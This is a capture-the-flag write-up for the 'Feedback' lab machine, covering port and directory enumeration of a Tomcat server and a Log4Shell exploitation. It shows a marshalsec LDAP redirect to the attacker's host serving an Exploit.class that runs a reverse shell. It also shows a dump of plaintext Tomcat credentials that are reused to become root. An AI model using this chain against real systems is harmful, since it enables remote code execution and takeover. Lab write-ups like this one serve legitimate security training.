Feedback VL

NMAP Scanning:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ nmap -A -sC -sV -p22,8080 10.10.127.134 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 14:44 EST
Nmap scan report for 10.10.127.134
Host is up (0.039s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 63:ef:9d:79:12:a0:1a:08:92:8e:0d:b7:4a:7d:b2:7d (RSA)
|   256 f8:bf:ad:21:f1:6b:e1:c8:dc:29:78:65:55:69:7e:37 (ECDSA)
|_  256 5d:56:d6:44:26:c2:da:53:73:62:77:3a:78:d4:11:65 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.56
|_http-title: Apache Tomcat/9.0.56
|_http-favicon: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   41.85 ms 10.8.0.1
2   41.97 ms 10.10.127.134

PORT 8080 - Directory Listing:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
└─$ wfuzz -u http://10.10.127.134:8080/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 68
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.127.134:8080/FUZZ
Total requests: 220559

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                     
=====================================================================

000000001:   200        198 L    490 W      11136 Ch    "# directory-list-2.3-medium.txt"                                                                                           
000000007:   200        198 L    490 W      11136 Ch    "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                                           
000000003:   200        198 L    490 W      11136 Ch    "# Copyright 2007 James Fisher"                                                                                             
000000014:   200        198 L    490 W      11136 Ch    "http://10.10.127.134:8080/"                                                                                                
000000013:   200        198 L    490 W      11136 Ch    "#"                                                                                                                         
000000012:   200        198 L    490 W      11136 Ch    "# on at least 2 different hosts"                                                                                           
000000011:   200        198 L    490 W      11136 Ch    "# Priority ordered case-sensitive list, where entries were found"                                                          
000000010:   200        198 L    490 W      11136 Ch    "#"                                                                                                                         
000000009:   200        198 L    490 W      11136 Ch    "# Suite 300, San Francisco, California, 94105, USA."                                                                       
000000006:   200        198 L    490 W      11136 Ch    "# Attribution-Share Alike 3.0 License. To view a copy of this"                                                             
000000004:   200        198 L    490 W      11136 Ch    "#"                                                                                                                         
000000005:   200        198 L    490 W      11136 Ch    "# This work is licensed under the Creative Commons"                                                                        
000000002:   200        198 L    490 W      11136 Ch    "#"                                                                                                                         
000000008:   200        198 L    490 W      11136 Ch    "# or send a letter to Creative Commons, 171 Second Street,"                                                                
000000090:   302        0 L      0 W        0 Ch        "docs"                                                                                                                      
000000141:   302        0 L      0 W        0 Ch        "feedback"                                                                                                                  
000000902:   302        0 L      0 W        0 Ch        "examples"                                                                                                                  
000004889:   302        0 L      0 W        0 Ch        "manager"

And we see a strange endpoint for a tomcat instance called feedback . So let’s check it:

In the source code we can see the following comment:

1
<!-- Build with Java, Struts2 & Log4J -->

Searching for Log4j we can see that there was a pretty big CVE about this so there are a lot of exploits and automated setups for this: https://github.com/kozmer/log4j-shell-poc?tab=readme-ov-file

If we use this github project we will need a specific version of java, so in order to download it without logining into Oracle, we will use the following converter: https://sites.google.com/view/java-se-download-url-converter/

Or we can use the following commands in order to do it manually:

1
2
3
4
└─$ java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.8.3.7/#Exploit"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Listening on 0.0.0.0:1389
Send LDAP reference result for Exploit redirecting to http://10.8.3.7/Exploit.class
1
2
3
4
5
6
7
8
9
10
11
12
python3 -m http.server 80 ( with Exploit.class and .java )
Exploit.java:
public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec("REVERSE SHELL ...");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
Compile: javac Exploit.java -source 8 -target 8

And we got a shell as the tomcat user:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
tomcat@ip-10-10-10-7:~/conf$ cat tomcat-users.xml
cat tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <user username="admin" password="H2RR3rGDrbAnPxWa" roles="manager-gui"/>
  <user username="robot" password="H2RR3rGDrbAnPxWa" roles="manager-script"/>

</tomcat-users>
tomcat@ip-10-10-10-7:~/conf$

With the password that we just found we can su - root and get the flag !